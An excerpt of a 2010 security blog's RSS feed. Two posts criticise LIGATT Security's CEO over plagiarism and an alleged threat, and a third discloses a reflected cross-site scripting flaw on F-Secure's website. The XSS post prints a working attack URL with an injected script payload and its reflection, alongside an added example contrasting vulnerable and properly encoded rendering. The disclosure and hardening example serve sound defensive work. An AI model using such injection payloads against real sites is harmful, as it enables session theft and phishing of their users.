<li><a href="http://praetorianprefect.com/archives/2010/03/a-loss-of-securityfocus/">A Loss of SecurityFocus</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/06/nationalcybersecurity-com-has-all-original-content/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>LIGATT&#8217;s Evans Strikes Back</title>
		<link>http://praetorianprefect.com/archives/2010/06/4305/</link>
		<comments>http://praetorianprefect.com/archives/2010/06/4305/#comments</comments>
		<pubDate>Fri, 18 Jun 2010 09:11:05 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Industry News]]></category>
		<category><![CDATA[charlatans]]></category>
		<category><![CDATA[ligatt]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=4305</guid>
		<description><![CDATA[<a href="http://attrition.org/errata/charlatan/gregory_evans/">Gregory Evans, the CEO of LIGATT Security,</a> is not taking the <a href="http://securitymusings.com/article/1950/ligatt-honestly-and-truly-scares-me">criticism</a> heaped <a href="http://attrition.org/errata/charlatan/gregory_evans/">upon himself and his firm</a> or his <a href="https://365.rsaconference.com/blogs/securityreading/2010/06/10/how-to-become-the-worlds-no-1-hacker">latest book</a> lying down.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/ligattthumb.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/ligattthumb-150x150.jpg" alt="" title="ligattthumb" width="150" height="150" class="alignleft size-thumbnail wp-image-4306" /></a></p>

<p><a href="http://attrition.org/errata/charlatan/gregory_evans/">Gregory Evans, the CEO of LIGATT Security,</a> is not taking the <a href="http://securitymusings.com/article/1950/ligatt-honestly-and-truly-scares-me">criticism</a> heaped <a href="http://attrition.org/errata/charlatan/gregory_evans/">upon himself and his firm</a> or his <a href="https://365.rsaconference.com/blogs/securityreading/2010/06/10/how-to-become-the-worlds-no-1-hacker">latest book</a> lying down. Yesterday he posted a pair of videos on “National Cyber Security”, a web site under the LIGATT umbrella, <a href="http://www.nationalcybersecurity.com/articles/441/1/How-Can-Computer-Nerds-Be-Racist/Page1.html">as part of an article</a> written by a “Seria Mullen”, News Researcher at LIGATT Security in which he puts forth that security professionals Chris John Riley and Ben Rothke are motivated by racism.</p>

<h3>Seria Mullen?</h3>

<p>Let&#8217;s start with the article&#8217;s author. Geoff Belknap’s research points out quickly that the Seria Mullen who wrote this less than eloquent article bears a striking resemblance to (actual person) Knox News reporter Chloe White Kennedy.</p>

<p>You decide:</p>

<p><div id="attachment_4312" class="wp-caption alignnone" style="width: 610px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/117095676.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/117095676.jpg" alt="" title="117095676" width="600" height="446" class="size-full wp-image-4312" /></a><p class="wp-caption-text">Article on Computer Nerds by Seria Mullen.</p></div>
<br /></p>

<p><div id="attachment_4313" class="wp-caption alignnone" style="width: 610px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/117096209.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/117096209.jpg" alt="" title="117096209" width="600" height="446" class="size-full wp-image-4313" /></a><p class="wp-caption-text">Knox Reporter Chloe Kennedy?</p></div>
<br /></p>

<p>Separated at birth perhaps?</p>

<h3>News Stories?</h3>

<p>It doesn’t take a brain surgeon to figure out that what are being presented as original articles by the mysterious doppelganger Ms. Mullen are just lifted directly from other places:</p>

<p><div id="attachment_4315" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/hsw.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/hsw.jpg" alt="" title="hsw" width="750" height="529" class="size-full wp-image-4315" /></a><p class="wp-caption-text">Homeland Security Newswire Story.</p></div>
<br /></p>

<p><div id="attachment_4314" class="wp-caption alignnone" style="width: 488px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/article_1.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/article_1.jpg" alt="" title="article_1" width="478" height="547" class="size-full wp-image-4314" /></a><p class="wp-caption-text">Story on LIGATT's National Cybersecurity.</p></div>
<br /></p>

<h3>Video – Part 1</h3>

<p>On to the two videos: <a href="http://www.nationalcybersecurity.com/articles/441/1/How-Can-Computer-Nerds-Be-Racist/Page1.html">http://www.nationalcybersecurity.com/articles/441/1/How-Can-Computer-Nerds-Be-Racist/Page1.html</a>.</p>

<p>Evans starts by going after security professionals Ben Rothke, who performed <a href="https://365.rsaconference.com/blogs/securityreading/2010/06/14/fair-use-plagiarism-and-the-world-s-no-1-hacker-book">a careful analysis of the plagiarized material</a> in “How to Become the World’s Number 1 Hacker”, and Chris Riley, who played a part in <a href="http://shitcast.co.uk/?p=68">a fairly respectful interview</a> of Evans on a podcast released yesterday, and whom Evans <a href="http://praetorianprefect.com/archives/2010/06/did-ligatt-securitys-ceo-threaten-the-life-of-a-security-professional/">threatened harm to for some reason, potentially identity confusion</a>.</p>

<p>For some reason he drones on about Kevin Mitnick, and suggests that the current security industry worships the work Mitnick did. He suggests in the video that Kevin Mitnick came to him for advice on the deal being offered him by the government while the two were incarcerated together.</p>

<p>This was quickly refuted by Mitnick himself:</p>

<p><div id="attachment_4330" class="wp-caption alignnone" style="width: 594px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/mitnick.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/mitnick.jpg" alt="" title="mitnick" width="584" height="326" class="size-full wp-image-4330" /></a><p class="wp-caption-text">Pretty unambiguous.</p></div>
<br /></p>

<p>At 11 minutes in he has still not referenced the plagiarism, ostensibly the reason for making the video response. The next minute is spent discussing how much money he has made and the help he says he has given to the community.</p>

<h3>Video &#8211; Part 2</h3>

<p>Evans finally decides to address the plagiarism issue in part two, wait, no he’s not.</p>

<p>Minute one walks through the media companies he has bamboozled into putting him on television. For some reason he equates his exposure to what he appears to put forth as a “right” to plagiarize the material of people he feels are less well known. He proceeds to discuss contracts held with <a href="http://attrition.org/errata/charlatan/gregory_evans/evans08.html">two professional sports franchises</a>, the Atlanta Hawks and Atlanta Thrashers; however, the contract shown appears to be with Arena Sports Marketing, LLC. The Chief Sales Officer of Atlanta Spirit LLC (parent company of the Thrashers) asserts that LIGATT has never provided “services for the Hawks, Thrashers, or Philips Arena”.</p>

<h4>E-mails Regarding the Sports Teams</h4>

<p>Ben Rothke took the time to verify his findings on this claim with representatives of the two sports teams:</p>

<pre><code>From: Ben Rothke
To: White, Tracy; Penningroth, Ailey
Sent: Sun Jun 13 10:14:13 2010
Subject: Is LIGATT Security in fact the official cyber security provider of the Atlanta Hawks?

Greetings,

I wrote a book review of *How To Become The Worlds No. 1 Hacker* -

https://365.rsaconference.com/blogs/securityreading/2010/06/10/how-to-become-the-worlds-no-1-hacker.

The book is nearly a complete work of plagiarism.

In the book, the author states that LIGATT is the official cyber security
provider of the Atlanta Hawks. I attached an excerpt of the book which
highlights that.

Note that he also says he is the official cyber security provider of
Phillips Arena and the Atlanta Thrashers.

Can you tell me if that claim is correct?

Thanks,

Ben
</code></pre>

<p>To which he received the following replies:</p>

<pre><code>On Sun, Jun 13, 2010 at 10:39 AM, White, Tracy &lt;
Tracy.White@atlantaspirit.com&gt; wrote:

That claim is not accurate. We are aware that he has made these statements
but they are not accurate.
</code></pre>

<pre><code>From: White, Tracy 
Date: Sun, Jun 13, 2010 at 11:32 AM
Subject: Re: Is LIGATT Security in fact the official cyber security provider of the Atlanta Hawks?
To: Ben Rothke
Cc: "Penningroth, Ailey", "Wilkinson, Scott" 

Ben - yes, you're correct....Ligatt doesn't provide (nor have they ever
provided) services for the Hawks, Thrashers or Philips Arena.
</code></pre>

<p><div id="attachment_4307" class="wp-caption alignnone" style="width: 617px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/Screen-shot-2010-06-17-at-12.11.34-AM.png"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/Screen-shot-2010-06-17-at-12.11.34-AM.png" alt="" title="Screen shot 2010-06-17 at 12.11.34 AM" width="607" height="396" class="size-full wp-image-4307" /></a><p class="wp-caption-text">Partial cut of a contract provided by Evans references a marketing company, not the teams.</p></div>
<br /></p>

<h4>Continuing&#8230;</h4>

<p>I passed out until 4:26, but there was a lot of bragging about something.</p>

<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/snake-oil-clip1-150x150.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/snake-oil-clip1-150x150.jpg" alt="" title="snake-oil-clip1-150x150" width="150" height="150" class="alignleft size-full wp-image-4338" /></a></p>

<p>He discusses his twitter program, Learn to Hack in 15 Minutes, for which he issued a press release on May 5th. The video cuts out, and then comes back to his discussion of a teacher teaching from a text book that the teacher didn’t write. In the podcast yesterday he references the fact that a preacher will read from the Bible, but did not actually write the Bible. His overall stance appears to be that he never said he would be writing his own content as opposed to taking content from other people, and that copying the content verbatim in his social media campaign is therefore okay. He is “taking a little here” and combining it for laypeople, which according to him is why <a href="http://attrition.org/errata/charlatan/gregory_evans/ligatt04/">he makes one million plus a year</a>.</p>

<p>He goes on to explain, with various metaphors, that the books are not written for a security audience. He discusses that Chris John Riley is a joke to him (again no one is sure why or the basis for his animosity). The video cuts in and out in this part where obvious edits have been made. He insults education, and calls his audience computer nerds. He makes some references to celebrities.</p>

<p>We are now at 19 minutes and the plagiarism charges, the reported reason for the videos, have not been addressed.</p>

<p>He goes on to reference Jobs, Gates, and Dell as people who, like himself, understand both the business “and computers”.</p>

<p>At 11:49 in video two the discussion of plagiarism finally begins: &#8220;I wrote 60% of my book.&#8221; The analysis does not support this: there are a number of chapters with 90% similarity rates to previously published work per the <a href="https://365.rsaconference.com/blogs/securityreading/2010/06/14/fair-use-plagiarism-and-the-world-s-no-1-hacker-book">iThenticate tool analysis run by Rothke</a>. Evans stated he put out a call for “ghost writers” to which he received “stacks and stacks of information”. He states that the actual authors of the work accepted a flat fee in exchange for signing away full rights to the created work, signing a release and confidentiality agreement. He claims the “people who wrote the stuff” aren’t calling him, or “posting to your board” that their authored works were taken. His claim is that they are not doing this because they signed both a release and a confidentiality agreement. The video cuts out at 13:47 while he is still talking.</p>

<h3>Refuting the Paid Authorship Claim</h3>

<p>This is done fairly quickly via an example. Below find a page from the book <u>How To Become The Worlds No. 1 Hacker</u>:</p>

<p><div id="attachment_4326" class="wp-caption alignnone" style="width: 610px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/116927652.png"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/116927652.png" alt="" title="116927652" width="600" height="580" class="size-full wp-image-4326" /></a><p class="wp-caption-text">Page from #1 Hacker Book.</p></div>
<br /></p>

<p>Now let&#8217;s look at a section of the article <a href="http://www.ethicalhacker.net/content/view/106/24/">MS Terminal Server Cracking</a> on ethicalhacker.net:</p>

<p><div id="attachment_4327" class="wp-caption alignnone" style="width: 710px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/ethical_hackernet.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/ethical_hackernet.jpg" alt="" title="ethical_hackernet" width="700" height="711" class="size-full wp-image-4327" /></a><p class="wp-caption-text">Article on ethicalhacker.net.</p></div>
<br /></p>

<p>Notice any similarities? Right down to forgetting to remove the name chrisgates on the command prompt, they&#8217;re the same.</p>

<p>So it&#8217;s a straight copy, but maybe Chris Gates was paid as Greg suggested, and elected to &#8220;sign a release&#8221;. Again, easily checked:</p>

<p><div id="attachment_4328" class="wp-caption alignnone" style="width: 583px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/chris_gates.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/chris_gates.jpg" alt="" title="chris_gates" width="573" height="210" class="size-full wp-image-4328" /></a><p class="wp-caption-text">Where's my money?</p></div>
<br /></p>

<p>Maybe the check is in the mail?</p>

<h3>Finally</h3>

<p>This many acts of taking another person’s work without attribution would not have made it past most publishing houses. But with that said, I can’t find another book that’s been published by “Cyber Crime Media”. This mostly nonsense, ham-fisted defense of his actions is amusing on some levels, although probably not for the two real security professionals he is lobbing unsupported accusations at.</p>

<p>Anyhow, we&#8217;re sick of the chicanery.</p>

<p>We know, two posts now on the LIGATT story line. It’s like a car accident we can’t look away from. We promise to get back on something more important soon.</p>

<h3>References</h3>

<ul>
<li><a href="http://attrition.org/errata/charlatan/gregory_evans/ligatt07/">Gregory D. Evans Criminal History</a></li>
<li><a href="https://365.rsaconference.com/blogs/securityreading/2010/06/14/fair-use-plagiarism-and-the-world-s-no-1-hacker-book">Fair use, plagiarism and the World’s No. 1 Hacker book</a></li>
<li><a href="http://securitymusings.com/article/1950/ligatt-honestly-and-truly-scares-me">LIGATT honestly and truly scares me</a></li>
<li><a href="http://crabbyolbastard.wordpress.com/2010/06/21/ligatt-a-cautionary-tale-of-cyber-security-snake-oil/">LIGATT, a Cautionary Tale of Cybersecurity Snake Oil</a></li>
</ul>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/asian-men-prefer-ligatt/">Asian Men Prefer LIGATT</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/06/nationalcybersecurity-com-has-all-original-content/">NationalCyberSecurity.com has all &#8220;Original Content&#8221;</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/06/did-ligatt-securitys-ceo-threaten-the-life-of-a-security-professional/">Did LIGATT Security&#8217;s CEO Threaten the Life of a Security Professional?</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/a-loss-of-securityfocus/">A Loss of SecurityFocus</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/06/4305/feed/</wfw:commentRss>
		<slash:comments>32</slash:comments>
		</item>
		<item>
		<title>Did LIGATT Security&#8217;s CEO Threaten the Life of a Security Professional?</title>
		<link>http://praetorianprefect.com/archives/2010/06/did-ligatt-securitys-ceo-threaten-the-life-of-a-security-professional/</link>
		<comments>http://praetorianprefect.com/archives/2010/06/did-ligatt-securitys-ceo-threaten-the-life-of-a-security-professional/#comments</comments>
		<pubDate>Fri, 18 Jun 2010 00:09:29 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Industry News]]></category>
		<category><![CDATA[charlatans]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=4268</guid>
		<description><![CDATA[How did one of these men come to threaten the lives of the other and his family?]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/ligatt.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/ligatt-150x150.jpg" alt="" title="ligatt" width="150" height="150" class="alignleft size-thumbnail wp-image-4299" /></a></p>

<p>European security analyst Chris John Riley is a well known and legitimate security professional who co-hosts the Eurotrash Security Podcast and writes on the <a href="http://blog.c22.cc/2010/06/17/threats/">Catch22 Insecurity blog</a>. Gregory Evans is a convicted felon (federal conspiracy and wire fraud against AT&amp;T and MCI for stealing 125 toll free telephone lines) who <a href="http://attrition.org/errata/charlatan/gregory_evans/evans02.html">paid $9 million in restitution</a>, was sentenced to 24 months in federal prison, and runs <a href="http://attrition.org/errata/charlatan/gregory_evans/">a dubious company</a> that makes <a href="http://praetorianprefect.com/archives/2010/05/best-information-security-commercial-evah/">great commercials</a> but also <a href="http://attrition.org/errata/charlatan/gregory_evans/evans08.html">claims a client list</a> they don&#8217;t actually have, <a href="https://365.rsaconference.com/blogs/securityreading/2010/06/14/fair-use-plagiarism-and-the-world-s-no-1-hacker-book">plagiarizes to write books</a>, and performs <a href="http://attrition.org/errata/charlatan/gregory_evans/ligatt04/">press release ping pong</a> with a penny stock. So how did one of these men come to <a href="http://blog.c22.cc/2010/06/17/threats/">threaten the lives</a> of the other and his family?</p>

<h3>The Buildup, The Book</h3>

<div id="attachment_4288" class="wp-caption alignright" style="width: 125px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/51av8ttEJ5L._SL160_AA115_.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/51av8ttEJ5L._SL160_AA115_.jpg" alt="" title="51av8ttEJ5L._SL160_AA115_" width="115" height="115" class="size-full wp-image-4288" /></a><p class="wp-caption-text">Book/plagiarism.</p></div>

<p>As mentioned, Riley is part of the Eurotrash Security Podcast, and as with many podcasts, interviews of information security professionals and personalities come with the territory. In that role, Riley sought to have Evans do an interview on the most recent charges that his book <u>How To Become The Worlds No. 1 Hacker</u> is largely <a href="https://365.rsaconference.com/blogs/securityreading/2010/06/14/fair-use-plagiarism-and-the-world-s-no-1-hacker-book">a work of plagiarism</a>.</p>

<p>So Riley called the LIGATT office in Atlanta, was eventually put through to Evans, and after discussing some preliminaries on the book agreed to an interview the following evening. Riley provided his blog URL and LIGATT&#8217;s secretary provided Evans&#8217; Skype ID (ligattsecurity) for the interview.</p>

<h3>15 Minutes Later&#8230;</h3>

<p>Within fifteen minutes of the phone call, the following comment was submitted to the book review section of Riley&#8217;s blog:</p>

<p><div id="attachment_4282" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/evans_quote.png"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/evans_quote.png" alt="" title="evans_quote" width="750" height="125" class="size-full wp-image-4282" /></a><p class="wp-caption-text">Comment received 15 minutes after phone call.</p></div>
<br /></p>

<p>So what would cause the CEO of a publicly traded company to fly off the handle in such an unreasonable way? The answer may be a case of mistaken identity. The 20Plus reference in the beginning of Evans&#8217; written rant makes no sense when applied to Chris John Riley. But there is a user on the forums of advfn.com, an investment web site, with that handle. And this is a user who <a href="http://investorshub.advfn.com/boards/read_msg.aspx?message_id=50580944">continually</a> <a href="http://investorshub.advfn.com/boards/read_msg.aspx?message_id=50306323">expresses dissatisfaction</a> with the LIGATT stock (LGTT) and <a href="http://investorshub.advfn.com/boards/read_msg.aspx?message_id=51048972">the management</a> <a href="http://investorshub.advfn.com/boards/read_msg.aspx?message_id=50309143">of the company</a>.</p>

<h3>Maybe It&#8217;s Not Evans</h3>

<p>We can allow for that possibility, but a preponderance of evidence shows otherwise. The whois for the IP address shows BellSouth, Atlanta GA, right where the LIGATT offices are. That, combined with the specific references to the phone call and the references to an Evans nemesis on the investment boards of ADVFN, suggests this was in fact Evans.</p>

<p><div id="attachment_4280" class="wp-caption alignnone" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/screen-shot-2010-06-17-at-10-43-58-pm.png"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/screen-shot-2010-06-17-at-10-43-58-pm.png" alt="" title="screen-shot-2010-06-17-at-10-43-58-pm" width="300" height="196" class="size-full wp-image-4280" /></a><p class="wp-caption-text">IP points to Atlanta, GA</p></div>
<br /></p>

<h3>Put up the money and challenge me!</h3>

<p>One of the lines in the comment references Mr. Evans&#8217; repeated call to &#8220;challenge him&#8221; to some manner of hacker competition.</p>

<p><div id="attachment_4273" class="wp-caption alignnone" style="width: 411px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/ligatt_challenge.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/ligatt_challenge.jpg" alt="" title="ligatt_challenge" width="401" height="202" class="size-full wp-image-4273" /></a><p class="wp-caption-text">LIGATT, ostensibly Evans, challenges the hackers of the world.</p></div>
<br /></p>

<p>A credible response to this challenge was made by Chris Nickerson, formerly of <a href="http://en.wikipedia.org/wiki/Tiger_Team_%28TV_series%29">Tiger Team fame</a> (a TruTV show demonstrating actual social engineering and hacking).</p>

<p><div id="attachment_4274" class="wp-caption alignnone" style="width: 309px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/screen-shot-2010-06-17-at-10-55-44-pm.png"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/screen-shot-2010-06-17-at-10-55-44-pm.png" alt="" title="screen-shot-2010-06-17-at-10-55-44-pm" width="299" height="200" class="size-full wp-image-4274" /></a><p class="wp-caption-text">Nickerson's unambiguous response.</p></div>
<br /></p>

<p>Thus far Evans continues to repeat the original challenge, while refusing to acknowledge that Mr. Nickerson has already accepted it.</p>

<h3>Finally</h3>

<p>This nonsense with Evans and this company has been far too much for far too long. It is a free country, and people can form firms and make a living, even reformed criminals. But the evidence suggests, as it has for a while, to steer clear of Ligatt and its volatile CEO. Far too many, especially in the media (Fox News, CNN, The History Channel), have been taken in by the wild claims of this outfit.</p>

<h3>Update</h3>

<p>The Student Hacker IT cast has posted their <a href="http://shitcast.co.uk/?p=68">LIGATT Interview</a>, which is fairly instructive of the issues discussed.</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/asian-men-prefer-ligatt/">Asian Men Prefer LIGATT</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/06/nationalcybersecurity-com-has-all-original-content/">NationalCyberSecurity.com has all &#8220;Original Content&#8221;</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/06/4305/">LIGATT&#8217;s Evans Strikes Back</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/a-loss-of-securityfocus/">A Loss of SecurityFocus</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/06/did-ligatt-securitys-ceo-threaten-the-life-of-a-security-professional/feed/</wfw:commentRss>
		<slash:comments>24</slash:comments>
		</item>
		<item>
		<title>F-Secure XSS on Anti-Theft Website</title>
		<link>http://praetorianprefect.com/archives/2010/06/f-secure-xss-on-anti-theft-website/</link>
		<comments>http://praetorianprefect.com/archives/2010/06/f-secure-xss-on-anti-theft-website/#comments</comments>
		<pubDate>Thu, 17 Jun 2010 20:19:24 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Cross Site Scripting]]></category>
		<category><![CDATA[antivirus]]></category>
		<category><![CDATA[f-secure]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=4247</guid>
		<description><![CDATA[In a new section supporting the release of an anti-theft product for mobile phones, the web site of Helsinki based anti-virus company F-Secure is vulnerable to cross site scripting (XSS).]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/F-secure_Logo.png"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/F-secure_Logo-150x150.png" alt="" title="F-secure_Logo" width="75" height="75" class="alignleft size-thumbnail wp-image-4249" /></a></p>

<p>In a new section supporting the release of an anti-theft product for mobile phones, the web site of Helsinki based anti-virus company F-Secure is vulnerable to cross site scripting (XSS).</p>

<h3>XSS String</h3>

<p>A hidden form field reflects the value of a query string parameter (hidManufacturer in this case) taken from the URL.</p>

<p><b>Attack URL:</b></p>

<pre><code>http://www.f-secure.com/en_EMEA/products/mobile/anti-theft-download/anti-theft-download-
wizard.html?hidManufacturer=%27%22%3E%3C/title%3E%3Cscript%3Ealert%28/Mikko%20rulz/%29%3C
/script%3E
</code></pre>

<p><b>First reflection of URL XSS name-value pair:</b></p>

<pre><code>&lt;input type="hidden" name="hidManufacturer" id="hidManufacturer" value="\'\&amp;quot;&amp;gt;&amp;lt;\/title&amp;gt;&amp;lt;
script&amp;gt;alert(\/Mikko rulz\/)&amp;lt;\/script&amp;gt;"/&gt;&lt;/p&gt;
</code></pre>

<p>But nothing happens on this reflection because the significant characters passed in the URL (the brackets and quotes) are encoded as &amp;quot;, &amp;gt; and &amp;lt; in the page output. This is generally recognized as <a href="http://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet#RULE_.231_-_HTML_Escape_Before_Inserting_Untrusted_Data_into_HTML_Element_Content">the right practice</a> to avoid many forms of cross site scripting attacks on web pages.</p>

<p>Unfortunately, a script later in the page references the passed-in string without any of the same encoding.</p>

<p><b>Second reflection in the page of the same value:</b></p>

<pre><code>&lt;script type="text/javascript"&gt;
    document.getElementById(''"&gt;&lt;/title&gt;&lt;script&gt;alert(/Mikko rulz/)&lt;/script&gt;').setAttribute("class", 
"selected");
    document.getElementById(''"&gt;&lt;/title&gt;&lt;script&gt;alert(/Mikko rulz/)&lt;/script&gt;').setAttribute("className", 
"selected");
&lt;/script&gt;
</code></pre>

<p><div id="attachment_4250" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/06/fsecure_xss1.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/06/fsecure_xss1.jpg" alt="" title="fsecure_xss" width="750" height="577" class="size-full wp-image-4250" /></a><p class="wp-caption-text">A Javascript reflects values unencoded from a name value pair in the URL.</p></div>
<br /></p>
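<p>As an added illustration (example code written for this post, not F-Secure&#8217;s page code or anything from xssed.com), the Node.js script below renders the same untrusted hidManufacturer value into both places described above: the hidden input with HTML attribute encoding, and the inline script either unencoded (as the page did) or with JavaScript string literal encoding that also neutralizes a closing tag. The function names, the check, and the decoded form of the payload quoted above are assumptions made for this example.</p>

```javascript
// Added example, not F-Secure's page code: rendering one untrusted URL
// parameter into two different output contexts. Function names and the
// decoded sample payload are constructed for this illustration.

// The value from the post's attack URL, percent-decoded (constructed here).
const PAYLOAD = "'\"></title><script>alert(/Mikko rulz/)</script>";

// HTML escaping for element content and double-quoted attribute values.
// This is the encoding the hidden input already received on the page.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Encoding for a JavaScript string literal inside an inline <script>.
// JSON.stringify supplies the quotes and escapes quotes, backslashes and
// control characters; the extra replacements guarantee that "</script>"
// and the U+2028/U+2029 line terminators can never appear in the literal.
function escapeJs(s) {
  return JSON.stringify(String(s))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e")
    .replace(/\//g, "\\/")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Mirrors the defect described in the post: the attribute context is
// encoded, but the same value is dropped into script source unchanged.
function renderVulnerable(manufacturer) {
  return [
    `<input type="hidden" name="hidManufacturer" id="hidManufacturer" value="${escapeHtml(manufacturer)}"/>`,
    `<script type="text/javascript">`,
    `    document.getElementById('${manufacturer}').setAttribute("class", "selected");`,
    `</script>`,
  ].join("\n");
}

// Same markup with context-appropriate encoding in both places.
function renderHardened(manufacturer) {
  return [
    `<input type="hidden" name="hidManufacturer" id="hidManufacturer" value="${escapeHtml(manufacturer)}"/>`,
    `<script type="text/javascript">`,
    `    document.getElementById(${escapeJs(manufacturer)}).setAttribute("class", "selected");`,
    `</script>`,
  ].join("\n");
}

// Defender's check: an HTML parser ends a script element at the first
// "</script>" it sees, so if the element body no longer contains the
// setAttribute call, untrusted data terminated the script early.
function scriptCutShort(html) {
  const m = html.match(/<script[^>]*>([\s\S]*?)<\/script>/i);
  const body = m ? m[1] : "";
  return !body.includes('.setAttribute("class"');
}

console.log("--- vulnerable ---\n" + renderVulnerable(PAYLOAD));
console.log("--- hardened ---\n" + renderHardened(PAYLOAD));
console.log("script cut short? vulnerable:", scriptCutShort(renderVulnerable(PAYLOAD)),
            "hardened:", scriptCutShort(renderHardened(PAYLOAD)));
```

<p>The point of the two renderers is that HTML entity encoding is the correct tool only for the attribute; once the value is interpolated into script source, the browser&#8217;s HTML parser still sees a literal <code>&lt;/script&gt;</code> and closes the element early, which is exactly why the first reflection was harmless and the second was not. The usual alternative to escaping for the script context is to avoid interpolating the value into script at all and instead read it from the already-encoded hidden input with <code>document.getElementById("hidManufacturer").value</code>.</p>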

<h3>Finally</h3>

<p>The Mikko reference is to Mikko Hypponen, the well known Chief Research Officer at F-Secure. The defect was <a href="http://www.xssed.com/mirror/67259/">submitted to XSSED</a> by Xylitol. At a glance this appears to be the first new web site specific problem with the main F-Secure web site (country specific versions have had issues) since the F-Secure forum defacement <a href="http://zone-h.org/mirror/id/6923295">in 2007</a>.</p>

<p>Reflected cross site scripting attacks are on the low end of the scale when it comes to web application vulnerabilities; however, they can be used effectively in phishing style attacks (ex: here is a URL to F-Secure, but I will attempt to steal a user session, redirect the user, serve them malware, etc. based on being able to execute a script as the F-Secure web site). As always, it behooves a security company to correct problems like this fairly quickly, and F-Secure clearly knows what to do already since they&#8217;re using output encoding in one part of the page already.</p>

<h3>Update 06/8/2010</h3>

<p>The problem was corrected quickly, and <a href="http://www.f-secure.com/weblog/archives/00001972.html">the issue explained</a> competently by Mikko, as expected.</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/formspring-me-xss-vulnerability/">Formspring.me XSS Vulnerability</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/xss-flaw-on-paypal-com/">XSS Flaw on PayPal.com</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/12/pentagon-web-pwned/">Pentagon Web Site Vulnerabilities Identified</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/06/f-secure-xss-on-anti-theft-website/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>iPhone 4 Ordering and Session Switching</title>
		<link>http://praetorianprefect.com/archives/2010/06/iphone-4-ordering-and-session-switching/</link>
		<comments>http://praetorianprefect.com/archives/2010/06/iphone-4-ordering-and-session-switching/#comments</comments>
		<pubDate>Tue, 15 Jun 2010 21:18:19 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[apple]]></category>
		<category><![CDATA[AT&T]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=4215</guid>
		<description><![CDATA[Upon logging into AT&#38;T online to place an order for the new iPhone, some users are reporting that another user's information is coming up including billing information, call history, and so forth.]]></description>
